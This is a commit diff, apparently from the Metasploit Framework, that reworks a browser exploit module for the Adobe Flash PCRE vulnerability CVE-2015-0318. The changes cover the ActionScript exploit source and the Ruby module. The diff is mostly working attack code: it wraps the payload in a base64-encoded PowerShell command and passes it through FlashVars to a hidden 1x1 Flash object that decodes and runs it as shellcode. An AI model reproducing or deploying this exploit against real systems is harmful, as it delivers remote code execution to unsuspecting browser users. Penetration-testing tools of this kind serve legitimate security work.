Temp

wchen-r7 · wchen-r7 · commit 43b90610b161 · 2015-03-11T13:53:34.000-05:00
diff --git a/data/exploits/CVE-2015-0318/Main.swf b/data/exploits/CVE-2015-0318/Main.swf
diff --git a/external/source/exploits/CVE-2015-0318/Main.as b/external/source/exploits/CVE-2015-0318/Main.as
@@ -3,6 +3,7 @@ package
 	import flash.display.*;
 	import flash.utils.ByteArray;
 	import flash.external.ExternalInterface;
+	import mx.utils.Base64Decoder;
 	
 	public class Main extends Sprite
 	{	
@@ -408,6 +409,16 @@ package
 			
 			return 0;
 		}
+
+		public function GetShellcodeParam():String {
+			var b64:Base64Decoder = new Base64Decoder();
+			var payload:String = "";
+			Alert("Gonna decode");
+			b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh);
+			Alert("Finished Decode");
+			payload = b64.toByteArray().toString();
+			return payload;
+		}
 		
 		public function WriteShellcode(v:Vector.<uint>, i:uint, ptr:uint, fun:uint):void {
 			
@@ -463,7 +474,11 @@ package
 		}
 		
 		public function Main() {
-			
+			Alert("1");
+			var sh:String = GetShellcodeParam();
+			Alert("2");
+			Debug("Shellcoe: " + sh.toString());
+
 			i = 0;
 
 			Initialise();
diff --git a/modules/exploits/windows/browser/adobe_flash_pcre.rb b/modules/exploits/windows/browser/adobe_flash_pcre.rb
@@ -10,6 +10,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   CLASSID =  'd27cdb6e-ae6d-11cf-96b8-444553540000'
 
+  include Msf::Exploit::Powershell
   include Msf::Exploit::Remote::BrowserExploitServer
 
   def initialize(info={})
@@ -82,25 +83,27 @@ def on_request_exploit(cli, request, target_info)
   def exploit_template(cli, target_info)
 
     swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
-    #shellcode = get_payload(cli, target_info).unpack("H*")[0]
+    target_payload = get_payload(cli, target_info)
+    psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
+    b64_payload = Rex::Text.encode_base64(psh_payload)
 
     html_template = %Q|<html>
     <body>
     <object classid="clsid:#{CLASSID}" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
     <param name="movie" value="<%=swf_random%>" />
     <param name="allowScriptAccess" value="always" />
-    <param name="FlashVars" value="" />
+    <param name="FlashVars" value="sh=<%=b64_payload%>" />
     <param name="Play" value="true" />
-    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="" Play="true"/>
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
     </object>
 
   <script>
   function debug_alert(msg) {
-    alert(msg);
+    console.log(msg);
   }
 
   function debug_print(msg) {
-    alert(msg);
+    console.log(msg);
   }
   </script>
     </body>
